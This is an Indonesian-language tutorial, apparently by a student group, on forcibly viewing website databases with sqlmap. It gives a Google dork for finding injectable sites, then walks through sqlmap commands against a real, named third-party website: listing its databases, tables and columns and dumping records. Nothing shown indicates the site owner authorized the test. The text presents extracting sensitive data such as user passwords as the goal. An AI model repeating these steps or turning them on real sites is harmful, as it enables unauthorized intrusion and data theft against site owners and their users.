Tutorial Melihat Database Website Menggunakan SQLmap

Anggota Kelompok : 

1. Muhammad Sutan Nizar Pratama          1715015068

2. Erdinal Respatti                                     1715015048

3. ABD Rohim                                           1715015056

4. Abi Suhardino                                        1715015071

5. Wildan Mahfudz Zarkasi                       1715015088

Balik lagi dengan tutorial baru dari kami, kali ini kami akan memberitahukan cara melihat database website menggunakan SQLmap, Setiap website yang kita kunjungi, pasti memiliki database yang terkait. database disini berfungsi untuk menyimpan data yang diolah dan diinputkan oleh user agar dapat digunakan di kemudian hari. data yang disimpan dalam database dapat berupa data yang sensitif, semisal kita ambil contoh yaitu penyimpanan id dan password user pada database. data ini dapat kita lihat secara paksa menggunakan tools SQLmap.

SQLmap merupakan tools untuk meng-injeksi sejumlah query pada database yang memiliki kecacatan. kecacatan disini dapat berupa kurangnya seleksi variabel pada PhP atau query yang bermasalah. SQL sendiri berasal dari singkatan Structured Query Languange yang merupakan bahasa yang digunakan untuk mengelola database.

Sebelum kita melakukan injeksi query pada sebuah web, pertama-tama kita harus mengetahui kecacatan yang ada pada web, kecacatan biasa yang rumpun di website adalah kecacatan id dengan parameter '.

inurl:index.php?id='

format diatas merupakan format google dork dimana google dork merupakan sintaks web yang sering ditemukan kecacatan. kali ini kita akan mencoba mencari kecacatan pada website,

www.vepakistan.com

gambar diatas merupakan website yang akan kita coba inject, kita coba testkecacatan web dengan menambahkan dork, yaitu,

http://www.vepakistan.com/detail.php?id='

dan website mengeluarkan output error seperti dibawah,

gambar diatas merupakan slah satu contoh error yang terjadi, jika website mengeluarkan error seperti gambar diatas, maka website dapat kita inject.

Untuk memulai inject, anda harus memiliki sistem operasi Kali Linux, kali linux erupakan sistem operasi untuk pentesting jaringan, Kali Linux sudah memiliki tools pentesting termasuk SQLmap, buka kali linux, dan open terminal. hal pertama adalah menjalankan sqlmap dengan menjalankan perintah dibawah ini pada terminal.

sqlmap 

setelah sqlmap telah jalan, maka langkah pertama adalah mencari database dari website yang ingin kita inject. dengan perintah

sqlmap -u [url] --dbs

disini kita menggunakan url http://www.vepakistan.com/detail.php?id=40, id yang digunakan bukan yang error, namun yang normalnya. seelah itu kita enter dan proses injeksi SQL akan dimulai.

Proses injeksi untuk melihat nama database terlihat seperti gambar diatas, proses awal adalah mengidentifikasi tipe database, pada website ini databse yang digunakan adalah MySQL, setelah itu mengecek parameter yang dimasukkan pada website ini, parameter yang kita tes adalah id. setelah proses selesai, maka nama database akan ditampilkan.

Pada gambar diatas, terdapat 2 database yang telah diidentifikasi, yaitu information_schema dan visitpakistan. information_schema merupakan database MySQL utama untuk mengurusi semua proses database dan database manual yang dibuat oleh pembuat web adalah visitpakistan. karena database telah didapatkan, selanjutnya adalah melihat konten dari database, yaitu tabel yang terdapat pada database dengan cara,

sqlmap -u [url] -D [nama_database] --tables

perintah diatas berfungsi untuk mengambil nama tabel yang terdapat pada database yang kita pilih. disini kita database visitpakistan dengan sintaks sqlmap -u http://www.vepakistan.com/detail.php?id=40 -D visitpakistan --tables. setelah itu kita akan menunggu proses pengambilan nama tabel.

terdapat 17 tabel yang telah didapat. selanjutnya kita akan melihat isi dari tabel, yaitu kolom dari tabel. dengan perintah,

sqlmap -u [url] -D [nama_database] -T [nama_tabel] --columns

pada perintah diatas, kita menggunakan sintaks sqlmap -u http://www.vepakistan.com/detail.php?id=40 -D visitpakistan -T city --columns untuk melihat isi kolom dari tabel city pada database visitpakistan. setelah itu kita tunggu lagi proses pengambilan kolom dari tabel city

pada gambar diatas kita telah mendapatkan kolom dari tabel yang ingin kita liat. dapat kita lihat bahwa kolom yang telah kita dapatkan adalah kolom cities dan id, selanjutnya adalah melihat record atau data yang tersimpan pada kolom tersebut. kita akan lanjutkan dengan melihat data pada kolom cities. untuk melanjutkan melihat record, menggunakan sintaks seperti dibawah ini,

sqlmap -u [url] -D [nama_database] -T [nama_tabel] -C [nama_kolom] --dump

kita lanjutkan sintaks kita dengan memasukkan perintah sqlmap -u http://www.vepakistan.com/detail.php?id=40 -D visitpakistan -T city -C cities --dump untuk melihat isi dari kolom cities.

data tersebut merupakan data yang kita cari.

sekian tutorial dari kami, semoga bermanfaat, sekian.